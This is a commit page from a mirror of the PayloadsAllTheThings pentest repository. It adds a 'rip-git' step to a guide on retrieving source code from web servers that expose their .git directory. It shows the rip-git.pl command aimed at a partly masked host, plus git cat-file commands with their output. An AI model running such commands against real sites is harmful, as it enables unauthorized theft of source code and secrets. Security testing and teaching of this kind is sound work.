1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-08 00:06:29 +02:00

Update Git-rip

This commit is contained in:
Swissky 2017-03-14 23:39:02 +01:00
parent 6b860c627e
commit b0769b19b0

View File

@ -21,6 +21,22 @@ bloorq@gmail.com <bloorq@gmail.com> 1452195279 +0000 commit (initial): index.
-o is a hash of particular Git object to download
```
5. Alternative way : rip-git
```
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
# SVN - Source management
SVN example (Wordpress)
```